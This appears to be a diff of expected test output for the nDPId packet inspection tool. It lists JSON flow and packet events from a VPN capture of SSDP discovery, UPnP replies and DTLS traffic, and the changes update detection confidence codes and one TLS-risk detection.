00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1569687267991,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1569687267991,"pkt":"AQBef\/\/6NDY7z3UoCABFAADKY+gAAAERWl4KAADj7\/\/\/+u+QB2wAtlB4TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687267991,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687267991,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1569687268026,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687268026,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0lz4AAGoGnmlKfcW8CgAA4wG73ipT95gP0J5AloAQAP3kSQAAAQEICqEOCgscDdIR"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268077,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1569687268077,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"thread_ts_msec":1569687268077,"pkt":"NDY7z3UopHczjPFACABFAAIeAABAAEARI1gKAACVCgAA45bY75ACCk+7SFRUUC8xLjEgMjAwIE9LDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkRBVEU6IFNhdCwgMjggU2VwIDIwMTkgMTY6MTQ6MjggR01UDQpFWFQ6DQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNDk6ODAwOC9zc2RwL2RldmljZS1kZXNjLnhtbA0KT1BUOiAiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogYjNiMTBmNmEtMWRkMS0xMWIyLWI3NDAtYWU5NDc5MzlkMzA4DQpTRVJWRVI6IExpbnV4LzMuOC4xMyssIFVQblAvMS4wLCBQb3J0YWJsZSBTREsgZm9yIFVQblAgZGV2aWNlcy8xLjYuMTgNClgtVXNlci1BZ2VudDogcmVkc29uaWMNClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDo3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODY6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KQk9PVElELlVQTlAuT1JHOiA0NzINCkNPTkZJR0lELlVQTlAuT1JHOiAxDQoNCg=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268077,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268077,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1569687268176,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687268176,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAg9AAAAQEIChwN0scGksZO"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687268376,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1569687268376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1569687268376,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTj5RAAEARlIwKAACXCgAA4wds75ABPzXfSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687268376,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687268376,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268559,"flow_last_seen":1569687268559,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687268559,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1569687268559,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1569687268559,"pkt":"AQBef\/\/6NDY7z3UoCABFAADKeUwAAAERRPoKAADj7\/\/\/+uDLB2wAtl89TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268559,"flow_last_seen":1569687268559,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687268559,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268559,"flow_last_seen":1569687268559,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687268559,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":413,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268746,"flow_last_seen":1569687268746,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1569687268746,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1569687268746,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1569687268746,"pkt":"LH6BsEqhNDY7z3UoCABFAAB\/CAgAAEAR+QMKAADjCCVmW9NbAbsAa+4DFgEAAAAAAAAAAAAAVgEAAEoAAAAAAAAASgEA7YnEaZ6hZImmhCHr0JUfCBctWVvywlB71JRnxl7mI4ogm7BxyKgEQGFPg0eizi7+AVQMevU74i4erAc5hyngJu8AAAIAOQEA"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":413,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268746,"flow_last_seen":1569687268746,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1569687268746,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268747,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1569687268747,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"thread_ts_msec":1569687268747,"pkt":"NDY7z3UopHczjPFACABFAAIeAABAAEARI1gKAACVCgAA48Oh4MsCCjG3SFRUUC8xLjEgMjAwIE9LDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkRBVEU6IFNhdCwgMjggU2VwIDIwMTkgMTY6MTQ6MjggR01UDQpFWFQ6DQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNDk6ODAwOC9zc2RwL2RldmljZS1kZXNjLnhtbA0KT1BUOiAiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogYjNiMTBmNmEtMWRkMS0xMWIyLWI3NDAtYWU5NDc5MzlkMzA4DQpTRVJWRVI6IExpbnV4LzMuOC4xMyssIFVQblAvMS4wLCBQb3J0YWJsZSBTREsgZm9yIFVQblAgZGV2aWNlcy8xLjYuMTgNClgtVXNlci1BZ2VudDogcmVkc29uaWMNClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDo3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODY6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KQk9PVElELlVQTlAuT1JHOiA0NzINCkNPTkZJR0lELlVQTlAuT1JHOiAxDQoNCg=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268747,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268747,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1569687268789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1569687268789,"pkt":"NDY7z3UoLH6BsEqhCABFAABMkFUAAPcRuegIJWZbCgAA4wG701sAOF8pFgEAAAAAAAAAAAAAIwMAABcAAAAAAAAAFwEAFGKRvPEadu7FYjYhjKxM1MN8EkEd"} 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1569687268790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":161,"pkt_l4_len":127,"thread_ts_msec":1569687268790,"pkt":"LH6BsEqhNDY7z3UoCABFAACTQPwAAEARv\/sKAADjCCVmW9NbAbsAf9nwFgEAAAAAAAAAAAEAagEAAF4AAQAAAAAAXgEA7YnEaZ6hZImmhCHr0JUfCBctWVvywlB71JRnxl7mI4ogm7BxyKgEQGFPg0eizi7+AVQMevU74i4erAc5hyngJu8UYpG88Rp27sViNiGMrEzUw3wSQR0AAgA5AQA="} -00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":503,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1569687268746,"flow_last_seen":1569687268992,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":365,"flow_tot_l4_payload_len":5474,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1569687268992,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":465,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687268746,"flow_last_seen":1569687268836,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":454,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1569687268836,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269094,"flow_last_seen":1569687269094,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1569687269094,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.1","src_port":52595,"dst_port":192,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1569687269094,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":1569687269094,"pkt":"LH6BsEqhNDY7z3UoCABFAAAg7WwAAEAReH0KAADjCgAAAc1zAMAADBGuCAEDEA=="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269223,"flow_last_seen":1569687269223,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687269223,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1569687269223,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1569687269223,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTj6FAAEARlH8KAACXCgAA4wds4MsBP0SkSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269223,"flow_last_seen":1569687269223,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687269223,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269223,"flow_last_seen":1569687269223,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687269223,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1569687269559,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1569687269559,"pkt":"AQBef\/\/6NDY7z3UoCABFAADKtRAAAAERCTYKAADj7\/\/\/+uDLB2wAtl89TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269561,"flow_last_seen":1569687269561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687269561,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1569687269561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687269561,"pkt":"pHczjPFANDY7z3UoCABFAABAAABAAEAGJUEKAADjCgAAld56H0gqQcOaAAAAALAC\/\/9B2AAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"} @@ -284,86 +285,86 @@ 